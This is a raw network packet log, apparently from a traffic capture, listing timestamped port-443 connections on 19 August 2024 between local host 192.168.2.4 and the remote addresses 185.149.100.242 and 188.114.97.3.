Aug 19, 2024 09:28:43.092417002 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.092436075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.092451096 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.092473984 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.092660904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.092675924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.092714071 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.092721939 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.092750072 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.092767000 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.093245029 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.093269110 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.093323946 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.093336105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.093374014 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.094203949 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.094229937 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.094271898 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.094284058 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.094301939 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.094319105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.094388008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.094417095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.094463110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.094470978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.094511032 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.099224091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.104167938 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.104191065 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.104239941 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.104253054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.104265928 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.104286909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.136404991 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.136435032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.136523008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.136538982 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.136684895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.136714935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.136755943 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.136755943 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.136765003 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.136779070 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.136806965 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.192565918 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.192589998 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.192713022 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.192730904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.192775011 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.193141937 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.193159103 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.193332911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.193344116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.193439960 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.194014072 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.194032907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.194120884 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.194132090 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.194214106 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.195312977 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.195331097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.195427895 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.195440054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.195522070 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.195878983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.195897102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.195997000 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.196007013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.196098089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.206760883 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.206787109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.206860065 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.206876040 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.207104921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.207104921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.229115963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.229137897 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.229367971 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.229389906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.229407072 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.229429960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.229541063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.229541063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.229551077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.229590893 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.285059929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.285088062 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.285268068 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.285288095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.285427094 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.286019087 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.286036015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.286134005 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.286147118 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.286237955 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.286654949 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.286669970 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.286748886 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.286758900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.286843061 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.287949085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.287965059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.288062096 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.288074017 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.288151026 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.288417101 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.288430929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.288510084 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.288518906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.288603067 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.298903942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.298926115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.298974037 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.298986912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.299012899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.299029112 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.322365046 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.322427034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.322540045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.322588921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.322588921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.322592974 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.322613001 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.322624922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.322648048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.372585058 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.377677917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.377693892 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.377799988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.377816916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.377857924 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.378441095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.378457069 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.378509045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.378521919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.378554106 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.379179955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.379194021 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.379236937 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.379249096 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.379266024 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.379282951 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.380649090 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.380662918 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.380717039 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.380728960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.380764008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.381057978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.381083965 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.381124973 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.381135941 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.381156921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.381174088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.391653061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.391695023 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.391753912 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.391767979 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.391781092 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.391803980 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.414822102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.414907932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.414947987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.415035963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.415100098 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.415143967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.415170908 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.415184975 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.415201902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.415230036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.470469952 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.470494032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.470570087 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.470601082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.470652103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.471225023 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.471244097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.471278906 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.471287012 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.471311092 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.471328974 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.471771002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.471795082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.471829891 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.471837997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.471859932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.471877098 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.473479033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.473496914 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.473532915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.473541021 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.473568916 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.473583937 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.473642111 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.473659992 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.473723888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.473731995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.473767996 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.474900007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.484251022 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.484332085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.484342098 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.484359980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.484392881 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.484402895 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.507474899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.507523060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.507550001 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.507560015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.507587910 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.507606030 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.507668972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.507729053 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.507730007 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.507755995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.507786036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.507801056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.563251019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.563282967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.563338995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.563369989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.563385010 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.563410044 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.563874960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.563890934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.563925028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.563934088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.563944101 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.563971996 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.564503908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.564517975 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.564574003 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.564582109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.564618111 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.566581011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.566602945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.566637039 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.566644907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.566670895 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.566692114 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.567183971 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.567207098 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.567235947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.567243099 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.567262888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.567285061 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.574404001 CEST	443	49760	188.114.97.3	192.168.2.4
Aug 19, 2024 09:28:43.574456930 CEST	49760	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:28:43.576473951 CEST	49760	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:28:43.576479912 CEST	443	49760	188.114.97.3	192.168.2.4
Aug 19, 2024 09:28:43.576822042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.576836109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.576870918 CEST	443	49760	188.114.97.3	192.168.2.4
Aug 19, 2024 09:28:43.576888084 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.576909065 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.576967001 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.576967955 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.600184917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.600234985 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.600275993 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.600296974 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.600440025 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.600440025 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.600442886 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.600476027 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.600528002 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.600544930 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.600548983 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.600569963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.600608110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.600630045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.622265100 CEST	49760	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:28:43.635823965 CEST	49760	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:28:43.635889053 CEST	49760	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:28:43.636086941 CEST	443	49760	188.114.97.3	192.168.2.4
Aug 19, 2024 09:28:43.661767006 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.661792994 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.661840916 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.661870003 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.661884069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.661910057 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.662098885 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662117004 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662163019 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.662172079 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662211895 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.662393093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662408113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662446022 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.662452936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662463903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662477016 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.662489891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662509918 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.662518024 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662529945 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.662545919 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.662569046 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.662806034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662822008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662858009 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.662866116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.662875891 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.662904024 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.669677019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.669712067 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.669756889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.669770002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.669784069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.669806957 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.692666054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.692692995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.692734957 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.692755938 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.692766905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.692790031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.692833900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.692851067 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.692888975 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.692898035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.692917109 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.692933083 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.754627943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.754657030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.754740953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.754786015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.754833937 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.754867077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.754894972 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.755112886 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.755136013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.755167007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.755177021 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.755192995 CEST	49759	443	192.168.2.4	185.149.100.242
